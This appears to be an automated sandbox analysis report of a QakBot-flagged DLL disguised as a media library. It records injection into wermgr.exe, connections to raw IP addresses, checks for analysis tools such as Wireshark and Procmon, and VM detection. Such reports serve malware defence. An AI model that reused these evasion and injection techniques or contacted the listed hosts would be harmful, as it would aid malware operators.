            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 mv_get_random_seed,BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,mvpriv_open,_read,_close,mvpriv_open,_read,_close,clock,clock,mv_sha_init,mv_sha_update,mv_sha_final,mv_log,abort,3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000C0B0 mv_cast5_crypt2,3_2_1000C0B0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000B0D0 mv_camellia_crypt,3_2_1000B0D0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10013100 mv_encryption_init_info_alloc,mv_mallocz,mv_mallocz,mv_mallocz,mv_mallocz,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_calloc,3_2_10013100
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000C1B0 mv_cast5_crypt,3_2_1000C1B0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100132D0 mv_encryption_init_info_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,3_2_100132D0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10002480 mv_aes_ctr_crypt,mv_aes_crypt,3_2_10002480
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10013480 mv_encryption_init_info_get_side_data,mv_encryption_init_info_alloc,mv_free,mv_free,mv_free,mv_free,mv_free,3_2_10013480
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100084B0 mv_blowfish_crypt,mv_blowfish_crypt_ecb,mv_blowfish_crypt_ecb,3_2_100084B0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100364E0 mv_rc4_crypt,3_2_100364E0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10002523 mv_aes_crypt,3_2_10002523
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001363B mv_encryption_init_info_alloc,3_2_1001363B
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000867B mv_blowfish_crypt_ecb,3_2_1000867B
            Source: F086.dll Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: unknown HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.6:49717 version: TLS 1.2
            Source: F086.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_041B9DA8 FindFirstFileW,FindNextFileW,18_2_041B9DA8

            Networking

            Source: Joe Sandbox ViewASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT
            Source: Joe Sandbox ViewASN Name: ASN-CXA-ALL-CCI-22773-RDCUS ASN-CXA-ALL-CCI-22773-RDCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 2.82.8.80 2.82.8.80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache Cookie: xpgn=1
            Source: unknownNetwork traffic detected: IP country count 30
            Source: unknownTCP traffic detected without corresponding DNS query: 124.122.47.148
            Source: unknownTCP traffic detected without corresponding DNS query: 151.65.167.77
            Source: national[1].htm.24.drString found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)
            Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
            Source: rundll32.exe, rundll32.exe, 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.488551661.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.495622337.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.504031322.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.504159065.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.508750049.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F086.dllString found in binary or memory: https://streams.videolan.org/upload/
            Source: national[1].htm.24.drString found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
            Source: national[1].htm.24.drString found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
            Source: national[1].htm.24.drString found in binary or memory: https://www.xfinity.com/networkmanagement
            Source: unknownDNS traffic detected: queries for: xfinity.com
            Source: unknownHTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.6:49717 version: TLS 1.2
            Source: loaddll32.exe, 00000000.00000002.498797073.000000000061B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: F086.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: 18.2.rundll32.exe.280c00.0.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 18.2.rundll32.exe.41b0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 18.2.rundll32.exe.280c00.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_041BA412 NtAllocateVirtualMemory,NtWriteVirtualMemory,18_2_041BA412
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_041BA823 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,18_2_041BA823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_041BCA0F NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,18_2_041BCA0F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_041C43F4 NtProtectVirtualMemory,NtProtectVirtualMemory,18_2_041C43F4
            Source: F086.dllBinary or memory string: OriginalFilenameavutil-lav-57.dll. vs F086.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncryptsslp.dll
            Source: F086.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\F086.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 652
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 652
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",next
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 652
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 652
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Zvymxv
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1714.tmp
            Source: classification engineClassification label: mal96.troj.evad.winDLL@31/23@2/100
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_041BD213 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,18_2_041BD213
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_041BC71C CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,18_2_041BC71C
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7152
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess684
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{7A3715E8-0BDD-4F96-8281-195EB8CC5AFD}
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{B7F1BC99-C279-4D6A-A285-6E2D7EAC45D6}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6716
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{7A3715E8-0BDD-4F96-8281-195EB8CC5AFD}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6712
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: F086.dllStatic PE information: More than 582 > 100 exports found
            Source: F086.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,3_2_1001F523
            Source: F086.dllStatic PE information: real checksum: 0xf1b7b should be: 0xee8fa

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5752 base: 1083C50 value: E9 63 D7 F2 FF
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCMON.EXE
            Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: BEHAVIORDUMPER.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DUMPCAP.EXEN
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SYSANALYZER.EXEG
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IMPORTREC.EXE~
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PETOOLS.EXEW
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IMPORTREC.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PETOOLS.EXE
            Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROC_ANALYZER.EXE
            Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SNIFF_HIT.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: TCPDUMP.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WINDUMP.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCMON.EXEO
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SNIFF_HIT.EXEU
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FILEMON.EXE[
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WINDUMP.EXEV
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WIRESHARK.EXEA
            Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IDAQ.EXE
            Source: wermgr.exe, 00000018.00000003.517941844.0000000007060000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SYSANALYZER.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DUMPCAP.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WIRESHARK.EXE
            Source: wermgr.exe, 00000018.00000003.560610862.0000000007060000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: FILEMON.EXE
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5496; Thread sleep count: 191 > 30
            Source: C:\Windows\SysWOW64\wermgr.exe TID: 4120; Thread sleep time: -75000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_18-12981
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_10035030 rdtsc 3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes graph_18-11917
            Source: C:\Windows\SysWOW64\wermgr.exe; Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_041BB883 GetSystemInfo,18_2_041BB883
            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 18_2_041B9DA8 FindFirstFileW,FindNextFileW,18_2_041B9DA8
            Source: C:\Windows\System32\loaddll32.exe; Thread delayed: delay time: 120000
            Source: Amcache.hve.9.dr; Binary or memory string: VMware
            Source: Amcache.hve.9.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: Amcache.hve.9.dr; Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
            Source: Amcache.hve.9.dr; Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.9.dr; Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.9.dr; Binary or memory string: VMware, Inc.
            Source: Amcache.hve.9.dr; Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
